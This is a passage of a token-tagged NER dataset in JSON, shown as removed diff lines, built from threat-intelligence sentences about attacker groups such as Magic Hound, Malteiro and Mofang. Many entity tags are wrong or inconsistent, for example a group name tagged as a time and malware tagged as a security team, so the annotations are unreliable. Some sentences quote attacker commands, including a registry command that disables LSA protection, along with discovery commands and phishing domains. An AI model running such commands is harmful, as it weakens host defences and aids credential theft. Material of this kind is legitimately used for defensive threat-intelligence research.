}, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "a", - "web", - "shell", - "to", - "execute", - "`nltest", - "/trusted_domains`", - "to", - "identify", - "trust", - "relationships." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "registered", - "fraudulent", - "domains", - "such", - "as", - "\"mail-newyorker.com\"", - "and", - "\"news12.com.recover-session-service.site\"", - "to", - "target", - "specific", - "victims", - "with", - "phishing", - "attacks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "compromised", - "domains", - "to", - "host", - "links", - "targeted", - "to", - "specific", - "phishing", - "victims." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "conducted", - "watering-hole", - "attacks", - "through", - "media", - "and", - "magazine", - "websites." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "Powershell", - "to", - "discover", - "email", - "accounts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "compromised", - "personal", - "email", - "accounts", - "through", - "the", - "use", - "of", - "legitimate", - "credentials", - "and", - "gathered", - "additional", - "victim", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "established", - "email", - "accounts", - "using", - "fake", - "personas", - "for", - "spearphishing", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "identified", - "high-value", - "email", - "accounts", - "in", - "academia,", - "journalism,", - "NGO's,", - "foreign", - "policy,", - "and", - "national", - "security", - "for", - "targeting." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Idus", - "B-Idus", - "B-OffAct", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "compromised", - "email", - "credentials", - "in", - "order", - "to", - "steal", - "sensitive", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "an", - "encrypted", - "http", - "proxy", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "used", - "base64-encoded", - "files", - "and", - "has", - "also", - "encrypted", - "embedded", - "strings", - "with", - "AES." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "the", - "Telegram", - "API", - "`sendMessage`", - "to", - "relay", - "data", - "on", - "compromised", - "devices." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "exploited", - "the", - "Log4j", - "utility", - "(CVE-2021-44228),", - "on-premises", - "MS", - "Exchange", - "servers", - "via", - "\"ProxyShell\"", - "(CVE-2021-34473,", - "CVE-2021-34523,", - "CVE-2021-31207),", - "and", - "Fortios", - "SSL", - "VPNs", - "(CVE-2018-13379)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "B-Features" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "deleted", - "and", - "overwrote", - "files", - "to", - "cover", - "tracks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "can", - "list", - "a", - "victim's", - "logical", - "drives", - "and", - "the", - "type,", - "as", - "well", - "the", - "total/free", - "space", - "of", - "the", - "fixed", - "devices.", - "Other", - "malware", - "can", - "list", - "a", - "directory's", - "contents." - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "acquired", - "mobile", - "phone", - "numbers", - "of", - "potential", - "targets,", - "possibly", - "for", - "mobile", - "malware", - "or", - "additional", - "phishing", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "a", - "function", - "to", - "determine", - "whether", - "the", - "C2", - "server", - "wishes", - "to", - "execute", - "the", - "newly", - "dropped", - "file", - "in", - "a", - "hidden", - "window." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "captured", - "the", - "IP", - "addresses", - "of", - "visitors", - "to", - "their", - "phishing", - "sites." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "disabled", - "LSA", - "protection", - "on", - "compromised", - "hosts", - "using", - "`\"reg\"", - "add", - "HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA", - "/v", - "RunAsPPL", - "/t", - "REG_DWORD", - "/d", - "0", - "/f`." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "downloaded", - "additional", - "code", - "and", - "files", - "from", - "servers", - "onto", - "victims." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "conducted", - "a", - "network", - "call", - "out", - "to", - "a", - "specific", - "website", - "as", - "part", - "of", - "their", - "initial", - "discovery", - "activity." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "is", - "capable", - "of", - "keylogging." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "stolen", - "domain", - "credentials", - "by", - "dumping", - "LSASS", - "process", - "memory", - "using", - "Task", - "Manager,", - "comsvcs.dll,", - "and", - "from", - "a", - "Microsoft", - "Active", - "Directory", - "Domain", - "Controller", - "using", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "copied", - "tools", - "within", - "a", - "compromised", - "network", - "using", - "RDP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "created", - "local", - "accounts", - "named", - "`help`", - "and", - "`DefaultAccount`", - "on", - "compromised", - "machines." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "collected", - ".PST", - "archives." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "opening", - "malicious", - "email", - "attachments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "opening", - "malicious", - "links", - "embedded", - "in", - "emails." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "named", - "a", - "malicious", - "script", - "CacheTask.bat", - "to", - "mimic", - "a", - "legitimate", - "task." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "`dllhost.exe`", - "to", - "mask", - "Fast", - "Reverse", - "Proxy", - "(FRP)", - "and", - "`MicrosoftOutLookUpdater.exe`", - "for", - "Plink." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Tool", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "modified", - "Registry", - "settings", - "for", - "security", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "KPortScan", - "3.0", - "to", - "perform", - "SMB,", - "RDP,", - "and", - "LDAP", - "scanning." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "communicated", - "with", - "its", - "C2", - "server", - "over", - "TCP", - "ports", - "4443", - "and", - "10151", - "using", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "PowerShell", - "for", - "execution", - "and", - "privilege", - "escalation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "can", - "list", - "running", - "processes." - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "Plink", - "to", - "tunnel", - "RDP", - "over", - "SSH." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "Fast", - "Reverse", - "Proxy", - "(FRP)", - "for", - "RDP", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "used", - "Registry", - "Run", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "Remote", - "Desktop", - "Services", - "to", - "copy", - "tools", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "exported", - "emails", - "from", - "compromised", - "Exchange", - "servers", - "including", - "through", - "use", - "of", - "the", - "cmdlet", - "`New-MailboxExportRequest.`" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "Ping", - "for", - "discovery", - "on", - "targeted", - "networks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "MiniDump", - "from", - "comsvcs.dll", - "when", - "dumping", - "LSASS", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "scheduled", - "tasks", - "to", - "establish", - "persistence", - "and", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "can", - "take", - "a", - "screenshot", - "and", - "upload", - "the", - "file", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "created", - "fake", - "LinkedIn", - "and", - "other", - "social", - "media", - "accounts", - "to", - "contact", - "targets", - "and", - "convince", - "them--through", - "messages", - "and", - "voice", - "communications--to", - "open", - "malicious", - "links." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "captured", - "the", - "user-agent", - "strings", - "from", - "visitors", - "to", - "their", - "phishing", - "sites." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "sent", - "malicious", - "URL", - "links", - "through", - "email", - "to", - "victims.", - "In", - "some", - "cases", - "the", - "URLs", - "were", - "shortened", - "or", - "linked", - "to", - "Word", - "documents", - "with", - "malicious", - "macros", - "that", - "executed", - "PowerShells", - "scripts", - "to", - "download", - "Pupy." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "SMS", - "and", - "email", - "messages", - "with", - "links", - "designed", - "to", - "steal", - "credentials", - "or", - "track", - "victims." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "used", - "various", - "social", - "media", - "channels", - "(such", - "as", - "LinkedIn)", - "as", - "well", - "as", - "messaging", - "services", - "(such", - "as", - "WhatsApp)", - "to", - "spearphish", - "victims." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "used", - "a", - "PowerShell", - "command", - "to", - "check", - "the", - "victim", - "system", - "architecture", - "to", - "determine", - "if", - "it", - "is", - "an", - "x64", - "machine.", - "Other", - "malware", - "has", - "obtained", - "the", - "OS", - "version,", - "UUID,", - "and", - "computer/host", - "name", - "to", - "send", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "gathers", - "the", - "victim's", - "local", - "IP", - "address,", - "MAC", - "address,", - "and", - "external", - "IP", - "address." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "quser.exe", - "to", - "identify", - "existing", - "RDP", - "connections." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "obtained", - "the", - "victim", - "username", - "and", - "sent", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "obtained", - "and", - "used", - "tools", - "like", - "Havij,", - "sqlmap,", - "Metasploit,", - "Mimikatz,", - "and", - "Plink." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "used", - "VBS", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "conducted", - "widespread", - "scanning", - "to", - "identify", - "public-facing", - "systems", - "vulnerable", - "to", - "CVE-2021-44228", - "in", - "Log4j", - "and", - "ProxyShell", - "vulnerabilities;", - "CVE-2021-26855,", - "CVE-2021-26857,", - "CVE-2021-26858,", - "and", - "CVE-2021-27065", - "in", - "on-premises", - "MS", - "Exchange", - "Servers;", - "and", - "CVE-2018-13379", - "in", - "Fortinet", - "FortiOS", - "SSL", - "VPNs." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "acquired", - "Amazon", - "S3", - "buckets", - "to", - "use", - "in", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "multiple", - "web", - "shells", - "to", - "gain", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "collected", - "names", - "and", - "passwords", - "of", - "all", - "Wi-Fi", - "networks", - "to", - "which", - "a", - "device", - "has", - "previously", - "connected." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "the", - "command-line", - "interface", - "for", - "code", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "a", - "tool", - "to", - "run", - "`cmd", - "/c", - "wmic", - "computersystem", - "get", - "domain`", - "for", - "discovery." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "obtained", - "credentials", - "from", - "mail", - "clients", - "via", - "NirSoft", - "MailPassView." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "stolen", - "credentials", - "stored", - "in", - "the", - "victim’s", - "browsers", - "via", - "software", - "tool", - "NirSoft", - "WebBrowserPassView." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "the", - "ability", - "to", - "deobfuscate", - "downloaded", - "files", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "injected", - "Mispadu’s", - "DLL", - "into", - "a", - "process." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "used", - "scripts", - "encoded", - "in", - "Base64", - "certificates", - "to", - "distribute", - "malware", - "to", - "victims." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "targets", - "organizations", - "in", - "a", - "wide", - "variety", - "of", - "sectors", - "via", - "the", - "use", - "of", - "Mispadu", - "banking", - "trojan", - "with", - "the", - "goal", - "of", - "financial", - "theft." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "relied", - "on", - "users", - "to", - "execute", - ".zip", - "file", - "attachments", - "containing", - "malicious", - "URLs." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "collects", - "the", - "installed", - "antivirus", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - ".zip", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "collects", - "the", - "machine", - "information,", - "system", - "architecture,", - "the", - "OS", - "version,", - "computer", - "name,", - "and", - "Windows", - "product", - "name." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malteiro", - "will", - "terminate", - "Mispadu's", - "infection", - "process", - "if", - "the", - "language", - "of", - "the", - "victim", - "machine", - "is", - "not", - "Spanish", - "or", - "Portuguese." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "Malteiro", - "has", - "utilized", - "a", - "dropper", - "containing", - "malicious", - "VBS", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "encrypted", - "their", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "quickly", - "deleted", - "`cbd.exe`", - "from", - "a", - "compromised", - "host", - "following", - "the", - "successful", - "deployment", - "of", - "their", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "downloaded", - "tools", - "and", - "malware", - "onto", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "used", - "unique", - "malware", - "in", - "their", - "operations,", - "including", - "metaMain", - "and", - "Mafalda." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Metador", - "has", - "used", - "TCP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "used", - "Microsoft's", - "Console", - "Debugger", - "in", - "some", - "of", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "used", - "the", - "Windows", - "command", - "line", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metador", - "has", - "established", - "persistence", - "through", - "the", - "use", - "of", - "a", - "WMI", - "event", - "subscription", - "combined", - "with", - "unusual", - "living-off-the-land", - "binaries", - "such", - "as", - "`cdb.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Moafee", - "has", - "been", - "known", - "to", - "employ", - "binary", - "padding." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Mofang", - "has", - "compressed", - "the", - "ShimRat", - "executable", - "within", - "malicious", - "email", - "attachments.", - "Mofang", - "has", - "also", - "encrypted", - "payloads", - "before", - "they", - "are", - "downloaded", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mofang's", - "malicious", - "spearphishing", - "attachments", - "required", - "a", - "user", - "to", - "open", - "the", - "file", - "after", - "receiving." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mofang's", - "spearphishing", - "emails", - "required", - "a", - "user", - "to", - "click", - "the", - "link", - "to", - "connect", - "to", - "a", - "compromised", - "website." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mofang", - "delivered", - "spearphishing", - "emails", - "with", - "malicious", - "documents,", - "PDFs,", - "or", - "Excel", - "files", - "attached." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": 